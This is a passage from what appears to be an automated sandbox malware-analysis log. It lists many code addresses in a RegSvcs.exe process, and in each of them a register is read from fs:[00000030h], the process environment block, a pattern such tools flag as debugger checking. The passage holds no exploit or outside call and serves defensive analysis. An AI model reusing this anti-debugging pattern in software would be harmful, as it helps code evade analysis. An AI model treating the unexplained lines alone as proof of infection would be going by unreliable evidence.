Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A950 mov eax, dword ptr fs:[00000030h]	7_2_0116A950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B0946 mov eax, dword ptr fs:[00000030h]	7_2_011B0946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC97C mov eax, dword ptr fs:[00000030h]	7_2_011BC97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01156962 mov eax, dword ptr fs:[00000030h]	7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01156962 mov eax, dword ptr fs:[00000030h]	7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01156962 mov eax, dword ptr fs:[00000030h]	7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117096E mov eax, dword ptr fs:[00000030h]	7_2_0117096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117096E mov edx, dword ptr fs:[00000030h]	7_2_0117096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117096E mov eax, dword ptr fs:[00000030h]	7_2_0117096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B89B3 mov esi, dword ptr fs:[00000030h]	7_2_011B89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B89B3 mov eax, dword ptr fs:[00000030h]	7_2_011B89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B89B3 mov eax, dword ptr fs:[00000030h]	7_2_011B89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011309AD mov eax, dword ptr fs:[00000030h]	7_2_011309AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011309AD mov eax, dword ptr fs:[00000030h]	7_2_011309AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011649D0 mov eax, dword ptr fs:[00000030h]	7_2_011649D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011629F9 mov eax, dword ptr fs:[00000030h]	7_2_011629F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011629F9 mov eax, dword ptr fs:[00000030h]	7_2_011629F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE9E0 mov eax, dword ptr fs:[00000030h]	7_2_011BE9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC810 mov eax, dword ptr fs:[00000030h]	7_2_011BC810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov ecx, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A830 mov eax, dword ptr fs:[00000030h]	7_2_0116A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160854 mov eax, dword ptr fs:[00000030h]	7_2_01160854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134859 mov eax, dword ptr fs:[00000030h]	7_2_01134859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134859 mov eax, dword ptr fs:[00000030h]	7_2_01134859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE872 mov eax, dword ptr fs:[00000030h]	7_2_011BE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE872 mov eax, dword ptr fs:[00000030h]	7_2_011BE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC89D mov eax, dword ptr fs:[00000030h]	7_2_011BC89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130887 mov eax, dword ptr fs:[00000030h]	7_2_01130887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011428D0 mov ecx, dword ptr fs:[00000030h]	7_2_011428D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E8C0 mov eax, dword ptr fs:[00000030h]	7_2_0115E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C8F9 mov eax, dword ptr fs:[00000030h]	7_2_0116C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C8F9 mov eax, dword ptr fs:[00000030h]	7_2_0116C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EB20 mov eax, dword ptr fs:[00000030h]	7_2_0115EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EB20 mov eax, dword ptr fs:[00000030h]	7_2_0115EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128B50 mov eax, dword ptr fs:[00000030h]	7_2_01128B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CB7E mov eax, dword ptr fs:[00000030h]	7_2_0112CB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142B79 mov eax, dword ptr fs:[00000030h]	7_2_01142B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142B79 mov eax, dword ptr fs:[00000030h]	7_2_01142B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142B79 mov eax, dword ptr fs:[00000030h]	7_2_01142B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140BBE mov eax, dword ptr fs:[00000030h]	7_2_01140BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140BBE mov eax, dword ptr fs:[00000030h]	7_2_01140BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130BCD mov eax, dword ptr fs:[00000030h]	7_2_01130BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130BCD mov eax, dword ptr fs:[00000030h]	7_2_01130BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130BCD mov eax, dword ptr fs:[00000030h]	7_2_01130BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138BF0 mov eax, dword ptr fs:[00000030h]	7_2_01138BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138BF0 mov eax, dword ptr fs:[00000030h]	7_2_01138BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138BF0 mov eax, dword ptr fs:[00000030h]	7_2_01138BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168BF0 mov ecx, dword ptr fs:[00000030h]	7_2_01168BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168BF0 mov eax, dword ptr fs:[00000030h]	7_2_01168BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168BF0 mov eax, dword ptr fs:[00000030h]	7_2_01168BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EBFC mov eax, dword ptr fs:[00000030h]	7_2_0115EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BCBF0 mov eax, dword ptr fs:[00000030h]	7_2_011BCBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01192BF6 mov eax, dword ptr fs:[00000030h]	7_2_01192BF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BCA11 mov eax, dword ptr fs:[00000030h]	7_2_011BCA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128A00 mov eax, dword ptr fs:[00000030h]	7_2_01128A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128A00 mov eax, dword ptr fs:[00000030h]	7_2_01128A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01154A35 mov eax, dword ptr fs:[00000030h]	7_2_01154A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01154A35 mov eax, dword ptr fs:[00000030h]	7_2_01154A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA38 mov eax, dword ptr fs:[00000030h]	7_2_0116CA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA24 mov eax, dword ptr fs:[00000030h]	7_2_0116CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160A50 mov eax, dword ptr fs:[00000030h]	7_2_01160A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140A5B mov eax, dword ptr fs:[00000030h]	7_2_01140A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140A5B mov eax, dword ptr fs:[00000030h]	7_2_01140A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142A45 mov eax, dword ptr fs:[00000030h]	7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142A45 mov eax, dword ptr fs:[00000030h]	7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142A45 mov eax, dword ptr fs:[00000030h]	7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACA72 mov eax, dword ptr fs:[00000030h]	7_2_011ACA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACA72 mov eax, dword ptr fs:[00000030h]	7_2_011ACA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA6F mov eax, dword ptr fs:[00000030h]	7_2_0116CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA6F mov eax, dword ptr fs:[00000030h]	7_2_0116CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA6F mov eax, dword ptr fs:[00000030h]	7_2_0116CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168A90 mov edx, dword ptr fs:[00000030h]	7_2_01168A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112EA80 mov eax, dword ptr fs:[00000030h]	7_2_0112EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112EA80 mov eax, dword ptr fs:[00000030h]	7_2_0112EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138AA0 mov eax, dword ptr fs:[00000030h]	7_2_01138AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138AA0 mov eax, dword ptr fs:[00000030h]	7_2_01138AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186AA4 mov eax, dword ptr fs:[00000030h]	7_2_01186AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130AD0 mov eax, dword ptr fs:[00000030h]	7_2_01130AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164AD0 mov eax, dword ptr fs:[00000030h]	7_2_01164AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164AD0 mov eax, dword ptr fs:[00000030h]	7_2_01164AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186ACC mov eax, dword ptr fs:[00000030h]	7_2_01186ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186ACC mov eax, dword ptr fs:[00000030h]	7_2_01186ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186ACC mov eax, dword ptr fs:[00000030h]	7_2_01186ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116AAEE mov eax, dword ptr fs:[00000030h]	7_2_0116AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116AAEE mov eax, dword ptr fs:[00000030h]	7_2_0116AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01126D10 mov eax, dword ptr fs:[00000030h]	7_2_01126D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01126D10 mov eax, dword ptr fs:[00000030h]	7_2_01126D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01126D10 mov eax, dword ptr fs:[00000030h]	7_2_01126D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164D1D mov eax, dword ptr fs:[00000030h]	7_2_01164D1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114AD00 mov eax, dword ptr fs:[00000030h]	7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114AD00 mov eax, dword ptr fs:[00000030h]	7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114AD00 mov eax, dword ptr fs:[00000030h]	7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B8D20 mov eax, dword ptr fs:[00000030h]	7_2_011B8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130D59 mov eax, dword ptr fs:[00000030h]	7_2_01130D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130D59 mov eax, dword ptr fs:[00000030h]	7_2_01130D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130D59 mov eax, dword ptr fs:[00000030h]	7_2_01130D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CDB1 mov ecx, dword ptr fs:[00000030h]	7_2_0116CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CDB1 mov eax, dword ptr fs:[00000030h]	7_2_0116CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CDB1 mov eax, dword ptr fs:[00000030h]	7_2_0116CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158DBF mov eax, dword ptr fs:[00000030h]	7_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158DBF mov eax, dword ptr fs:[00000030h]	7_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01166DA0 mov eax, dword ptr fs:[00000030h]	7_2_01166DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EDD3 mov eax, dword ptr fs:[00000030h]	7_2_0115EDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EDD3 mov eax, dword ptr fs:[00000030h]	7_2_0115EDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4DD7 mov eax, dword ptr fs:[00000030h]	7_2_011B4DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4DD7 mov eax, dword ptr fs:[00000030h]	7_2_011B4DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115CDF0 mov eax, dword ptr fs:[00000030h]	7_2_0115CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115CDF0 mov ecx, dword ptr fs:[00000030h]	7_2_0115CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01150DE1 mov eax, dword ptr fs:[00000030h]	7_2_01150DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CDEA mov eax, dword ptr fs:[00000030h]	7_2_0112CDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CDEA mov eax, dword ptr fs:[00000030h]	7_2_0112CDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h]	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h]	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h]	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h]	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4C0F mov eax, dword ptr fs:[00000030h]	7_2_011B4C0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CC00 mov eax, dword ptr fs:[00000030h]	7_2_0116CC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112EC20 mov eax, dword ptr fs:[00000030h]	7_2_0112EC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136C50 mov eax, dword ptr fs:[00000030h]	7_2_01136C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136C50 mov eax, dword ptr fs:[00000030h]	7_2_01136C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136C50 mov eax, dword ptr fs:[00000030h]	7_2_01136C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164C59 mov eax, dword ptr fs:[00000030h]	7_2_01164C59
